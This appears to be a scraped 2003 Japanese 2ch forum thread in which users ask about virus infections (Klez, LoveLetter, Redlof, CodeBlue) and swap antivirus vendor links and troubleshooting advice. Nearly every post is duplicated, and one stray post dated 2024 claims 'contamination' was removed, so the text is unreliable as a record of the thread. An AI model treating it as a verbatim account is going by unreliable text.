☆ウィルス情報&質問 総合スレッド☆part9
1 :名無しさん@お腹いっぱい。:
ウィルスに関わる話題・質問はこちらに
ウィルスかどうかはウィルススキャンして判断してください。
IPAセキュリティセンターhttp://www.ipa.go.jp/security/isg/virus.html
Symantec Security Response
http://www.symantec.com/region/jp/sarcj/
Trend Micro ウイルス情報
http://www.trendmicro.co.jp/virusinfo/index.asp
McAfee ウイルス情報
http://www.nai.com/japan/virusinfo/vinfo.asp
オンラインウイルス検索
http://housecall.antivirus.com/housecall/start_jp.asp
[関連リンク]過去ログ・関連スレ等>>1-20あたり 補足>>1-50
ウィルスかどうかはウィルススキャンして判断してください。
IPAセキュリティセンターhttp://www.ipa.go.jp/security/isg/virus.html
Symantec Security Response
http://www.symantec.com/region/jp/sarcj/
Trend Micro ウイルス情報
http://www.trendmicro.co.jp/virusinfo/index.asp
McAfee ウイルス情報
http://www.nai.com/japan/virusinfo/vinfo.asp
オンラインウイルス検索
http://housecall.antivirus.com/housecall/start_jp.asp
[関連リンク]過去ログ・関連スレ等>>1-20あたり 補足>>1-50
|
|
|
・ウィルス用ソフトを入れて無い人は(知識や技術のある人を除いて)速やかに入れましょう
無料ウィルス用ソフトAVP/AVG/Ad簡(その2
http://pc.2ch.net/test/read.cgi/sec/1027400238/l50
・[Ctrrl]か{コマンド}と{F}キーを押すとページ内検索が出来ます
このスレや過去スレの過去ログを検索してから質問してください
2chスレッド検索http://www.ruitomo.com/~gulab/k.html
・ノートンを使用して誤反応かな と思う人はこちら
ノートンがvbsウィルスのソースに誤反応2
http://pc2.2ch.net/test/read.cgi/pcqa/1033948204/l50
シマンテックセキュリティチェック(オンラインウィルススキャンができる)
http://www.symantec.com/region/jp/securitycheck/index.html
ウイルスバスターオンラインスキャン
http://www.trendmicro.co.jp/hcall/index.asp
無料ウィルス用ソフトAVP/AVG/Ad簡(その2
http://pc.2ch.net/test/read.cgi/sec/1027400238/l50
・[Ctrrl]か{コマンド}と{F}キーを押すとページ内検索が出来ます
このスレや過去スレの過去ログを検索してから質問してください
2chスレッド検索http://www.ruitomo.com/~gulab/k.html
・ノートンを使用して誤反応かな と思う人はこちら
ノートンがvbsウィルスのソースに誤反応2
http://pc2.2ch.net/test/read.cgi/pcqa/1033948204/l50
シマンテックセキュリティチェック(オンラインウィルススキャンができる)
http://www.symantec.com/region/jp/securitycheck/index.html
ウイルスバスターオンラインスキャン
http://www.trendmicro.co.jp/hcall/index.asp
過去スレ
このウイルス何?
http://pc.2ch.net/test/read.cgi/sec/999636595/l50
☆ウィルス情報&質問 総合スレッド☆
http://pc.2ch.net/sec/kako/1010/10109/1010948022.html
☆ウィルス情報&質問 総合スレッド☆part2
http://pc.2ch.net/sec/kako/1016/10168/1016863569.html
☆ウィルス情報&質問 総合スレッド☆part3
http://pc.2ch.net/sec/kako/1020/10206/1020696417.html
☆ウィルス情報&質問 総合スレッド☆part4
http://pc.2ch.net/sec/kako/1024/10240/1024061532.html
☆ウィルス情報&質問 総合スレッド☆part5
http://pc.2ch.net/sec/kako/1027/10273/1027397623.html
☆ウィルス情報&質問 総合スレッド☆part6
http://pc.2ch.net/sec/kako/1031/10317/1031796923.html
☆ウィルス情報&質問 総合スレッド☆part7
http://pc.2ch.net/sec/kako/1035/10354/1035401865.html
☆ウィルス情報&質問 総合スレッド☆part8
http://pc.2ch.net/test/read.cgi/sec/1039859073/
このウイルス何?
http://pc.2ch.net/test/read.cgi/sec/999636595/l50
☆ウィルス情報&質問 総合スレッド☆
http://pc.2ch.net/sec/kako/1010/10109/1010948022.html
☆ウィルス情報&質問 総合スレッド☆part2
http://pc.2ch.net/sec/kako/1016/10168/1016863569.html
☆ウィルス情報&質問 総合スレッド☆part3
http://pc.2ch.net/sec/kako/1020/10206/1020696417.html
☆ウィルス情報&質問 総合スレッド☆part4
http://pc.2ch.net/sec/kako/1024/10240/1024061532.html
☆ウィルス情報&質問 総合スレッド☆part5
http://pc.2ch.net/sec/kako/1027/10273/1027397623.html
☆ウィルス情報&質問 総合スレッド☆part6
http://pc.2ch.net/sec/kako/1031/10317/1031796923.html
☆ウィルス情報&質問 総合スレッド☆part7
http://pc.2ch.net/sec/kako/1035/10354/1035401865.html
☆ウィルス情報&質問 総合スレッド☆part8
http://pc.2ch.net/test/read.cgi/sec/1039859073/
4 : ◆FdL1jBqM3g :03/02/21 17:36
>>1士ね
Symantec Security Check
http://security2.norton.com/SSC/GetBrowser.asp?pkj=TICCYSHSFVIGMKIIPLB&scantype=2&plfid=20&langid=jp&venid=sym&from=/ssc/lunavbrk.asp
オンラインウイルス検索
http://housecall.antivirus.com/housecall/start_jp.asp
検索窓にファイル名等を入力して利用。
基本中の基本だけど、ワクチンベンダーごとに、ウイルスの命名は違う。
Symantecウイルス辞典日本語版
http://www.symantec.com/region/jp/sarcj/vinfodb.html
Symantecウイルス辞典英語版(日本語版と微妙に内容が異なる事がある)
http://www.symantec.com/avcenter/vinfodb.html
TrendMicroウイルス情報
http://www.trendmicro.co.jp/vinfo/
McAFEEウイルス情報
http://vil.mcafee.com/default.asp?
http://security2.norton.com/SSC/GetBrowser.asp?pkj=TICCYSHSFVIGMKIIPLB&scantype=2&plfid=20&langid=jp&venid=sym&from=/ssc/lunavbrk.asp
オンラインウイルス検索
http://housecall.antivirus.com/housecall/start_jp.asp
検索窓にファイル名等を入力して利用。
基本中の基本だけど、ワクチンベンダーごとに、ウイルスの命名は違う。
Symantecウイルス辞典日本語版
http://www.symantec.com/region/jp/sarcj/vinfodb.html
Symantecウイルス辞典英語版(日本語版と微妙に内容が異なる事がある)
http://www.symantec.com/avcenter/vinfodb.html
TrendMicroウイルス情報
http://www.trendmicro.co.jp/vinfo/
McAFEEウイルス情報
http://vil.mcafee.com/default.asp?
[ウィルス対策ソフト]
【ノートン】インターネットセキュリティ Ver.20【2003】
http://pc.2ch.net/test/read.cgi/sec/1045790391/l50
【不具合】ウイルスバスター2003Part7【警告書】
http://pc.2ch.net/test/read.cgi/sec/1045411876/l50
がんばれマカフィーPART2
http://pc.2ch.net/test/read.cgi/sec/1036507506/l50
がんばれ!!ウイルス警備隊V3
http://pc.2ch.net/test/read.cgi/sec/1005442785/l50
[ウィルス対策ソフト(無料)]
無料ウィルス用ソフトAVP/AVG/Ad簡(その2
http://pc.2ch.net/test/read.cgi/sec/1027400238/l50
H+BEDV Antivir Personal Edition Part2
http://pc.2ch.net/test/read.cgi/sec/1016561367/l50
【フリー】AVG Anti-Virus Version6
http://pc.2ch.net/test/read.cgi/sec/1043502704/l50
アンチドートを語ろう♪
http://pc.2ch.net/test/read.cgi/sec/1003987914/l50
最強のウィルス対策用ソフト
http://pc.2ch.net/test/read.cgi/sec/1000957607/l50
【ノートン】インターネットセキュリティ Ver.20【2003】
http://pc.2ch.net/test/read.cgi/sec/1045790391/l50
【不具合】ウイルスバスター2003Part7【警告書】
http://pc.2ch.net/test/read.cgi/sec/1045411876/l50
がんばれマカフィーPART2
http://pc.2ch.net/test/read.cgi/sec/1036507506/l50
がんばれ!!ウイルス警備隊V3
http://pc.2ch.net/test/read.cgi/sec/1005442785/l50
[ウィルス対策ソフト(無料)]
無料ウィルス用ソフトAVP/AVG/Ad簡(その2
http://pc.2ch.net/test/read.cgi/sec/1027400238/l50
H+BEDV Antivir Personal Edition Part2
http://pc.2ch.net/test/read.cgi/sec/1016561367/l50
【フリー】AVG Anti-Virus Version6
http://pc.2ch.net/test/read.cgi/sec/1043502704/l50
アンチドートを語ろう♪
http://pc.2ch.net/test/read.cgi/sec/1003987914/l50
最強のウィルス対策用ソフト
http://pc.2ch.net/test/read.cgi/sec/1000957607/l50
「森で遊ぼう」
(ファイヤーウォールソフト・無料ウィルス用ソフト等セキュリティ関係解
説サイト
ダウンロードページのリンク 日本語解説ページあり)
http://eazyfox.tripod.co.jp/
・IE(インターネットエクスプローラ)やOE(アウトルックエクスプレス)は危な
いと感じた人達へ
ネスケ(ネットスケープコミュニケータ)やOperaを使用するという手段があることも
念頭にいれておいてください
http://home.netscape.com/ja/
http://www.jp.opera.com/
(ファイヤーウォールソフト・無料ウィルス用ソフト等セキュリティ関係解
説サイト
ダウンロードページのリンク 日本語解説ページあり)
http://eazyfox.tripod.co.jp/
・IE(インターネットエクスプローラ)やOE(アウトルックエクスプレス)は危な
いと感じた人達へ
ネスケ(ネットスケープコミュニケータ)やOperaを使用するという手段があることも
念頭にいれておいてください
http://home.netscape.com/ja/
http://www.jp.opera.com/
新種のウィルスが流行したときは専用スレのリンクよろしくお願いします
「Nimda !! 」【その4】
http://pc.2ch.net/test/read.cgi/sec/1001864573/l50
猛威をふるう BADTRANS.B Re: メール (4通目)
http://pc.2ch.net/test/read.cgi/sec/1008355163/l50
HDぜんぶ消去した上ズタズタに!!ウィルス
http://pc.2ch.net/sec/kako/1001/10016/1001662997.html
Flashムービーに感染するウィルスが登場!
http://pc.2ch.net/sec/kako/1010/10105/1010564675.html
'code red'wormに続きw32/sircam
http://pc.2ch.net/test/read.cgi/sec/995726416/l50
W32.Aliz.Wormって何?
http://pc.2ch.net/test/read.cgi/sec/1006266327/l50
またIEにセキュリティホール!
http://pc.2ch.net/test/read.cgi/sec/1008610094/l50
開いただけでウイルスに感染するページ
http://pc.2ch.net/test/read.cgi/sec/994847789/l50
WORM_GONE.A
http://pc.2ch.net/sec/kako/1007/10075/1007514716.html
Mac用ウイルス対策ソフト
http://pc.2ch.net/test/read.cgi/sec/1007675941/l50
「Nimda !! 」【その4】
http://pc.2ch.net/test/read.cgi/sec/1001864573/l50
猛威をふるう BADTRANS.B Re: メール (4通目)
http://pc.2ch.net/test/read.cgi/sec/1008355163/l50
HDぜんぶ消去した上ズタズタに!!ウィルス
http://pc.2ch.net/sec/kako/1001/10016/1001662997.html
Flashムービーに感染するウィルスが登場!
http://pc.2ch.net/sec/kako/1010/10105/1010564675.html
'code red'wormに続きw32/sircam
http://pc.2ch.net/test/read.cgi/sec/995726416/l50
W32.Aliz.Wormって何?
http://pc.2ch.net/test/read.cgi/sec/1006266327/l50
またIEにセキュリティホール!
http://pc.2ch.net/test/read.cgi/sec/1008610094/l50
開いただけでウイルスに感染するページ
http://pc.2ch.net/test/read.cgi/sec/994847789/l50
WORM_GONE.A
http://pc.2ch.net/sec/kako/1007/10075/1007514716.html
Mac用ウイルス対策ソフト
http://pc.2ch.net/test/read.cgi/sec/1007675941/l50
virus下さい。
http://pc.2ch.net/test/read.cgi/sec/996909531/l50
みんなでウイルスつくろうよ!!
http://pc.2ch.net/test/read.cgi/sec/1008248305/l50
[初心者必見]分かりやすいnimda対策ページ
http://pc.2ch.net/sec/kako/1001/10014/1001407163.html
コードレッドパート5 日本政府は反省汁
http://pc.2ch.net/test/read.cgi/sec/997783469/l50
KDMEMPKD.EXEってなに?
http://pc.2ch.net/sec/kako/1011/10113/1011333304.html
怪奇画像(怖い女)が一定感覚で現れる症状
http://pc.2ch.net/test/read.cgi/hack/1011083919/l50
気持ち悪い女の顔が
http://pc.2ch.net/test/read.cgi/sec/1012037926/l50
今日最新のウイルスって・・・!!(Myparty)
http://pc.2ch.net/test/read.cgi/sec/1012220835/l50
HDぜんぶ消去した上ズタズタに!!ウィルス 2台目
http://pc.2ch.net/sec/kako/1012/10122/1012296560.html
破損、トロイ、ウィルス入り 4
http://tmp.2ch.net/download/kako/1016/10168/1016806114.html
http://pc.2ch.net/test/read.cgi/sec/996909531/l50
みんなでウイルスつくろうよ!!
http://pc.2ch.net/test/read.cgi/sec/1008248305/l50
[初心者必見]分かりやすいnimda対策ページ
http://pc.2ch.net/sec/kako/1001/10014/1001407163.html
コードレッドパート5 日本政府は反省汁
http://pc.2ch.net/test/read.cgi/sec/997783469/l50
KDMEMPKD.EXEってなに?
http://pc.2ch.net/sec/kako/1011/10113/1011333304.html
怪奇画像(怖い女)が一定感覚で現れる症状
http://pc.2ch.net/test/read.cgi/hack/1011083919/l50
気持ち悪い女の顔が
http://pc.2ch.net/test/read.cgi/sec/1012037926/l50
今日最新のウイルスって・・・!!(Myparty)
http://pc.2ch.net/test/read.cgi/sec/1012220835/l50
HDぜんぶ消去した上ズタズタに!!ウィルス 2台目
http://pc.2ch.net/sec/kako/1012/10122/1012296560.html
破損、トロイ、ウィルス入り 4
http://tmp.2ch.net/download/kako/1016/10168/1016806114.html
【ネット】『C』で記述した初のウイルスが登場
http://news.2ch.net/newsplus/kako/1015/10150/1015048480.html
ダイヤルQ2か国際電話に接続を切り替えるやつ
<IT>CからZドライブを全て上書きするFinal Fantasyワーム
http://news.2ch.net/newsplus/kako/1015/10159/1015938003.html
【ウィルス警報】patch.exeに注意しる!
http://pc.2ch.net/test/read.cgi/sec/1016082075/l50
<IT>ご注意!チェック済み装うウイルス「マイライフB」
http://news.2ch.net/newsplus/kako/1016/10168/1016802914.html
ADSLユーザーにも 国際電話発信トラブル
http://pc.2ch.net/test/read.cgi/sec/1016106504/l50
【勝手にDLし勝手に実行!ひとりエッチ上手なIE6】
http://pc.2ch.net/sec/kako/1016/10164/1016485189.html
IE5・5と6・0、ネット閲覧ソフトに欠陥
http://pc.2ch.net/test/read.cgi/sec/1005605775/l50
PE_Mtx.A, WORM_MTX.A に犯されました。
http://pc.2ch.net/sec/kako/1015/10159/1015939831.html
開いただけでウイルスに感染するページ
http://pc.2ch.net/test/read.cgi/sec/994847789/l50
Klez系,Klez.Eスレッド
http://pc.2ch.net/sec/kako/1018/10182/1018248786.html
http://news.2ch.net/newsplus/kako/1015/10150/1015048480.html
ダイヤルQ2か国際電話に接続を切り替えるやつ
<IT>CからZドライブを全て上書きするFinal Fantasyワーム
http://news.2ch.net/newsplus/kako/1015/10159/1015938003.html
【ウィルス警報】patch.exeに注意しる!
http://pc.2ch.net/test/read.cgi/sec/1016082075/l50
<IT>ご注意!チェック済み装うウイルス「マイライフB」
http://news.2ch.net/newsplus/kako/1016/10168/1016802914.html
ADSLユーザーにも 国際電話発信トラブル
http://pc.2ch.net/test/read.cgi/sec/1016106504/l50
【勝手にDLし勝手に実行!ひとりエッチ上手なIE6】
http://pc.2ch.net/sec/kako/1016/10164/1016485189.html
IE5・5と6・0、ネット閲覧ソフトに欠陥
http://pc.2ch.net/test/read.cgi/sec/1005605775/l50
PE_Mtx.A, WORM_MTX.A に犯されました。
http://pc.2ch.net/sec/kako/1015/10159/1015939831.html
開いただけでウイルスに感染するページ
http://pc.2ch.net/test/read.cgi/sec/994847789/l50
Klez系,Klez.Eスレッド
http://pc.2ch.net/sec/kako/1018/10182/1018248786.html
11 :ひみつの検疫さん:2024/12/20(金) 14:40:10 ID:MarkedRes
汚染を除去しました。
12 :名無しさん@お腹いっぱい。:03/02/21 17:42
>>4
氏ね
http://www.google.co.jp/search?q=%E2%97%86FdL1jBqM3g&ie=UTF-8&oe=UTF-8&hl=ja&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=
氏ね
http://www.google.co.jp/search?q=%E2%97%86FdL1jBqM3g&ie=UTF-8&oe=UTF-8&hl=ja&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=
情報・質問 よろしこ
14 :名無しさん@お腹いっぱい。:03/02/21 17:59
メールでウイルスらしきものが送られてきたのですが
それからしばらくしてから
Cフォルダの中に t3vvから続くネームのファイルが数十個できてます
容量は0ですがネットゲームなどでLAGが激しくなって辛いです。。。
なんのウイルスですかね?
それからしばらくしてから
Cフォルダの中に t3vvから続くネームのファイルが数十個できてます
容量は0ですがネットゲームなどでLAGが激しくなって辛いです。。。
なんのウイルスですかね?
15 :名無しさん@お腹いっぱい。:03/02/21 18:02
>>1 乙かれ
16 :名無しさん@お腹いっぱい。:03/02/21 18:03
17 :名無しさん@お腹いっぱい。:03/02/21 18:05
乙
18 :名無しさん@お腹いっぱい。:03/02/21 20:55
port17300ってなに?なぜ話題にならないの
19 :名無しさん@お腹いっぱい。:03/02/21 21:44
質問です
VBS.LoveLetter.Var
VBS.LoveLetter.A
Macro.srcが2つ
W32.Klez.H@mm
上記のウィルスに感染したことがNorton AntiVirusでわかりました。
検疫から復元しようとしても「復元できませんでした」と表示され、どうしてよいか悩んでいます。
感染ファイルはソフトにより隔離されているようなのですが、これらのファイルは削除してもよいのでしょうか?
batファイルやinstall.exeなども含まれています。
アドバイスよろしくお願いいたします。
VBS.LoveLetter.Var
VBS.LoveLetter.A
Macro.srcが2つ
W32.Klez.H@mm
上記のウィルスに感染したことがNorton AntiVirusでわかりました。
検疫から復元しようとしても「復元できませんでした」と表示され、どうしてよいか悩んでいます。
感染ファイルはソフトにより隔離されているようなのですが、これらのファイルは削除してもよいのでしょうか?
batファイルやinstall.exeなども含まれています。
アドバイスよろしくお願いいたします。
20 :名無しさん@お腹いっぱい。:03/02/21 22:01
REDLOFって危険ですか?かってに増殖とかするのでしょうか
21 :名無しさん@お腹いっぱい。:03/02/21 22:03
22 :cheshire-cat ◆PhCATJR.v6 :03/02/21 22:48
>>20
ある程度はご自身で調べられてはいがかでしょうか。
http://members.jcom.home.ne.jp/aisora/subREDLOF.htm
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=VBS_REDLOF.A
http://www.symantec.com/region/jp/sarcj/data/h/html.redlof.a.html
http://www.nai.com/japan/virusinfo/virR.asp?v=VBS/Redlof@M
http://www.sophos.co.jp/virusinfo/analyses/vbsredlofa.html
http://www.ah.wakwak.com/~winfaq/cgi-bin/wforum.cgi?mode=allread&no=226118&page=0
ある程度はご自身で調べられてはいがかでしょうか。
http://members.jcom.home.ne.jp/aisora/subREDLOF.htm
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=VBS_REDLOF.A
http://www.symantec.com/region/jp/sarcj/data/h/html.redlof.a.html
http://www.nai.com/japan/virusinfo/virR.asp?v=VBS/Redlof@M
http://www.sophos.co.jp/virusinfo/analyses/vbsredlofa.html
http://www.ah.wakwak.com/~winfaq/cgi-bin/wforum.cgi?mode=allread&no=226118&page=0
23 :19:03/02/21 23:31
>>21
ファイル名は
1034171196.dat
1034781170.dat
1036519761.dat
1041230281.dat
app[1].bat
bgcolor.exe
hspace.scr
install.exe
yuzu2
です。
ファイル名は
1034171196.dat
1034781170.dat
1036519761.dat
1041230281.dat
app[1].bat
bgcolor.exe
hspace.scr
install.exe
yuzu2
です。
前スレに間違って書き込んでしまったのでこちらにコピペさせてもらいます
>>705
>>800番台
でsvchost.exeの話が出ていましたが、私も聞きお尋ねしたいことがあるのでよろしくお願いします
当方環境
NT:FileServer *1 / 98:proxy *1 / 98.SE.Me: *10 / xpHome: *9
ある日会社に出社すると、meマシンのタスク右下に****ゲートウェイデバイス(忘れた、レジ〜だったような)が発見されましたとメッセージが出ました
誰かTAかなにかの通信機器を増設したのかなと思っていましたが。起動するたびに毎回出るしネットワークに依存するアプリケーションの
レスポンスが悪くなったので、調査を開始
最近導入したxp4台の内一番怪しい(管理がずさんなPC)をLANから外してみました..するとBINGO!!です、起動時Meのメッセージは表示されなくなりました。
タスクマネージャー確認しトラフィックを発生させると思わせる項目NetworkService(当たり前)でsvchost.exeの項目があったので他のマシンを確認してみると他のマシンは4つ稼動がしていないのに、管理がずさんなPCは5つ稼動していました。
そこでググって見るとsvchostとCodeBlue関連の説明があり、ずさんPCの再インストールをしてMSのSP1も導入
するとMeの起動時メッセージも出なくなりスタンドアロンのアプリ(98系でのみ稼動)も異常の発生する前に回復しました
>>705
>>800番台
でsvchost.exeの話が出ていましたが、私も聞きお尋ねしたいことがあるのでよろしくお願いします
当方環境
NT:FileServer *1 / 98:proxy *1 / 98.SE.Me: *10 / xpHome: *9
ある日会社に出社すると、meマシンのタスク右下に****ゲートウェイデバイス(忘れた、レジ〜だったような)が発見されましたとメッセージが出ました
誰かTAかなにかの通信機器を増設したのかなと思っていましたが。起動するたびに毎回出るしネットワークに依存するアプリケーションの
レスポンスが悪くなったので、調査を開始
最近導入したxp4台の内一番怪しい(管理がずさんなPC)をLANから外してみました..するとBINGO!!です、起動時Meのメッセージは表示されなくなりました。
タスクマネージャー確認しトラフィックを発生させると思わせる項目NetworkService(当たり前)でsvchost.exeの項目があったので他のマシンを確認してみると他のマシンは4つ稼動がしていないのに、管理がずさんなPCは5つ稼動していました。
そこでググって見るとsvchostとCodeBlue関連の説明があり、ずさんPCの再インストールをしてMSのSP1も導入
するとMeの起動時メッセージも出なくなりスタンドアロンのアプリ(98系でのみ稼動)も異常の発生する前に回復しました
ひと段落した思いきや、別のxpもレスポンスが悪いとの報告が有ったので調査開始
再インストールをしてもレスポンスに波があるというか、なかなかつながりません、一旦つながるとサクサク行くのですが急に悪化したりという状況
LANカードのドライバの入れなおし、ハブの交換、LANケーブルの交換...すべてだめ
そこでproxyのZAとBJDを停止したのですが解消されず
NTを止めるとxpとMe間ではサクサクとデータが流れます
多分NTも感染していると思われるのですが、単純に怪しい実行ファイルの削除・レジストリの変更をするだけでいいのでしょうか?
あと、このような現象が起こるのはCodeBlueで間違いないと考えて良いのでしょうか?
よろしくお願いいたします
http://www.google.co.jp/search?hl=ja&ie=UTF-8&oe=UTF-8&q=codeblue+svchost&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=lang_ja
http://www.isskk.co.jp/support/techinfo/general/codebluej_xforce.html
ここを見ると3年前にパッチが出ていると書いていますた....逝ってよしですね
再インストールをしてもレスポンスに波があるというか、なかなかつながりません、一旦つながるとサクサク行くのですが急に悪化したりという状況
LANカードのドライバの入れなおし、ハブの交換、LANケーブルの交換...すべてだめ
そこでproxyのZAとBJDを停止したのですが解消されず
NTを止めるとxpとMe間ではサクサクとデータが流れます
多分NTも感染していると思われるのですが、単純に怪しい実行ファイルの削除・レジストリの変更をするだけでいいのでしょうか?
あと、このような現象が起こるのはCodeBlueで間違いないと考えて良いのでしょうか?
よろしくお願いいたします
http://www.google.co.jp/search?hl=ja&ie=UTF-8&oe=UTF-8&q=codeblue+svchost&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=lang_ja
http://www.isskk.co.jp/support/techinfo/general/codebluej_xforce.html
ここを見ると3年前にパッチが出ていると書いていますた....逝ってよしですね
26 :名無しさん@お腹いっぱい。:03/02/22 01:27
特定のアドレスから毎日数通ウイルスが送られてくるのですが
携帯メールみたいに受信拒否指定みたいなやり方があったら教えてください。
携帯メールみたいに受信拒否指定みたいなやり方があったら教えてください。
27 :名無しさん@お腹いっぱい。:03/02/22 01:45
28 :名無しさん@お腹いっぱい。:03/02/22 01:48
29 :cheshire-cat ◆PhCATJR.v6 :03/02/22 07:58
>>24-25
CodeBlueは、感染例がほとんど無いんですが。IIS導入してなければ、喰らわないし。
svchost.exeというファイルを作成しるウイルスは、こゆのもあったりして。
http://www.symantec.com/region/jp/sarcj/data/w/w32.hllw.cozit.html
http://www.symantec.com/region/jp/sarcj/data/b/backdoor.litmus.203.b.html
>一旦つながるとサクサク行くのですが急に悪化したりという状況
>NTを止めるとxpとMe間ではサクサクとデータが流れます
パソのネットワーク関連の設定ミスとかって可能性は無いんでしょか。
台数がやや多いようですが、マスタブラウザとかブラウジングとか。
ZoneAlarmって、そゆ名前解決のトラフィックはブロックしても表示してくれなかったりするんで。
Sygate PFWのFree版突っ込んで、パケットログを取るように設定して、BlockAllをポチッと押して観測しるとか。
http://soho.sygate.com/
http://members.tripod.co.jp/eazyfox/Firewall/Sybergen/Ver4/syga41.htm
CodeBlueは、感染例がほとんど無いんですが。IIS導入してなければ、喰らわないし。
svchost.exeというファイルを作成しるウイルスは、こゆのもあったりして。
http://www.symantec.com/region/jp/sarcj/data/w/w32.hllw.cozit.html
http://www.symantec.com/region/jp/sarcj/data/b/backdoor.litmus.203.b.html
>一旦つながるとサクサク行くのですが急に悪化したりという状況
>NTを止めるとxpとMe間ではサクサクとデータが流れます
パソのネットワーク関連の設定ミスとかって可能性は無いんでしょか。
台数がやや多いようですが、マスタブラウザとかブラウジングとか。
ZoneAlarmって、そゆ名前解決のトラフィックはブロックしても表示してくれなかったりするんで。
Sygate PFWのFree版突っ込んで、パケットログを取るように設定して、BlockAllをポチッと押して観測しるとか。
http://soho.sygate.com/
http://members.tripod.co.jp/eazyfox/Firewall/Sybergen/Ver4/syga41.htm
30 :名無しさん@お腹いっぱい。:03/02/22 09:22
>>24
怪しいファイルはとりあえず解析してもらうってのはどうでしょう?
http://www.symantec.co.jp/region/jp/sarcj/reference/submit.html
怪しいファイルはとりあえず解析してもらうってのはどうでしょう?
http://www.symantec.co.jp/region/jp/sarcj/reference/submit.html
31 :メールヘッダは??????:03/02/22 10:59
>>26
ToとFromを削除して書き込んでくれ。
ToとFromを削除して書き込んでくれ。
32 :名無しさん@お腹いっぱい。:03/02/22 11:03
33 :名無しさん@お腹いっぱい。:03/02/22 11:05
あら、ケコーン
35 :ひろちゃん:03/02/22 11:10
レスありがとうございます
最初に感染経路とその状況も書いたほうがよかったですね
感染経路:ほかの会社に仕事に行ってP2Pでつないで仕事をした
そこの会社では仕事中に職員がMXしてたという話...(W
状況 :ノートン2002導入済み パッチも12月後半までの分は実施済み
なぜCodeBlueと考えたかというと、exeファイルなのでアンチウィルスには引っかかりづらいとの記述があったからです
でも、たしかCodeBlueであればc\windows\にexeファイルがあるはずなのに、それが見つけられない...
Meは影響を受けていない
>>29さんへ
>パソのネットワーク関連の設定ミスとかって可能性は無いんでしょか
いまトラフィックが発生しているXpも去年の時点ではなんともたかったのです
再インストール(怪しい)PCを導入した時点では、ネットワークに何の障害も出ていなかったですし
>>Sygate PFWのFree版突っ込んで、パケットログを取るように設定して、BlockAllをポチッと押して観測しるとか
なりほどそういう手がありますね、クライアントに入れてほっとけば、どこからパケットが飛んで来てるか判るのですね
外部につながるクライアントにはアンチウィルスを入れていたのですが、NTに入れるとデータ転送速度の低下が考えられたので導入はしていなかったです
NTにノートンを入れて検索もやってみます
私が書いた、NTを止めてxpとMeでは問題なしということであれば、NTに依存する問題であるという考えは間違ってるでしょうか?
>>30さんへ
怪しいファイルを見つけられないのです...
原因が判らないと社内大インストール大会が始まります....(藁藁藁
最初に感染経路とその状況も書いたほうがよかったですね
感染経路:ほかの会社に仕事に行ってP2Pでつないで仕事をした
そこの会社では仕事中に職員がMXしてたという話...(W
状況 :ノートン2002導入済み パッチも12月後半までの分は実施済み
なぜCodeBlueと考えたかというと、exeファイルなのでアンチウィルスには引っかかりづらいとの記述があったからです
でも、たしかCodeBlueであればc\windows\にexeファイルがあるはずなのに、それが見つけられない...
Meは影響を受けていない
>>29さんへ
>パソのネットワーク関連の設定ミスとかって可能性は無いんでしょか
いまトラフィックが発生しているXpも去年の時点ではなんともたかったのです
再インストール(怪しい)PCを導入した時点では、ネットワークに何の障害も出ていなかったですし
>>Sygate PFWのFree版突っ込んで、パケットログを取るように設定して、BlockAllをポチッと押して観測しるとか
なりほどそういう手がありますね、クライアントに入れてほっとけば、どこからパケットが飛んで来てるか判るのですね
外部につながるクライアントにはアンチウィルスを入れていたのですが、NTに入れるとデータ転送速度の低下が考えられたので導入はしていなかったです
NTにノートンを入れて検索もやってみます
私が書いた、NTを止めてxpとMeでは問題なしということであれば、NTに依存する問題であるという考えは間違ってるでしょうか?
>>30さんへ
怪しいファイルを見つけられないのです...
原因が判らないと社内大インストール大会が始まります....(藁藁藁
36 :ひろちゃん:03/02/22 11:14
>外部につながるクライアントにはアンチウィルスを入れていたのですが、NTに入れるとデータ転送速度の低下が考えられたので導入はしていなかったです
これSygate PFWのことではなくてノートンのことです
これSygate PFWのことではなくてノートンのことです
37 :初心者:03/02/22 13:22
質問です。
当方Windows2000、ウイルスバスター2003使用のPCなのですが、
さきほどからパソコンがガリガリ鳴り出しまして、ウイルスバスターの
パーソナルファイアーウォールログをみましたところ、
「トロイの木馬ブロック」が一分間に何回もあるみたいなんです。
不安になって接続切ってウイルス検索かけたのですが、ウイルスは検出されませんでした。
ウイルスないのに木馬が攻撃してくることってあるのでしょうか?
ちなみに数日前まで、STDE9.exeというファイルがウイルス検索に引っかかり、
調べてみたところTROJ_FLOOD.BI.DRに犯されていたのですが、
trendmicroのホームページ通りの処置をしてここ数日間はウイルスの検出が
ない状態でした。今回はウイルス検出もないのにトロイアタックを受けて
へこんでいます。アドバイスお願いします。
当方Windows2000、ウイルスバスター2003使用のPCなのですが、
さきほどからパソコンがガリガリ鳴り出しまして、ウイルスバスターの
パーソナルファイアーウォールログをみましたところ、
「トロイの木馬ブロック」が一分間に何回もあるみたいなんです。
不安になって接続切ってウイルス検索かけたのですが、ウイルスは検出されませんでした。
ウイルスないのに木馬が攻撃してくることってあるのでしょうか?
ちなみに数日前まで、STDE9.exeというファイルがウイルス検索に引っかかり、
調べてみたところTROJ_FLOOD.BI.DRに犯されていたのですが、
trendmicroのホームページ通りの処置をしてここ数日間はウイルスの検出が
ない状態でした。今回はウイルス検出もないのにトロイアタックを受けて
へこんでいます。アドバイスお願いします。
38 :名無しさん@お腹いっぱい。:03/02/22 13:26
>>37
トロイの木馬ブロックってのは
必ずしもトロイが進入しようとしたってわけではなく
ある種のトロイがよく使うPortに何か来たよ、って警告だと思われ
ゴミパケかも知れないし、トロイかも知れない
ただ、ブロックで出てればほぼ問題はないと思われ
トロイの木馬ブロックってのは
必ずしもトロイが進入しようとしたってわけではなく
ある種のトロイがよく使うPortに何か来たよ、って警告だと思われ
ゴミパケかも知れないし、トロイかも知れない
ただ、ブロックで出てればほぼ問題はないと思われ
39 :初心者:03/02/22 13:35
さらに調べたところ、以下のような記述が掲示板にありました。
>外部からの操作を可能にするための通信プログラムである "PSEXEC.EXE" を使用して、「TROJ_FLOOD.BI.DR」のコンポーネントである "STDE9.EXE" を作成して実行します。
>また、"PSEXEC.EXE"はプログラム自体の機能としては不正なものではありませんのでウイルス検出はありません。
タスクバーの何も無い部分でマウス右押し→タスクマネージャー→プロセスで確認して味噌。
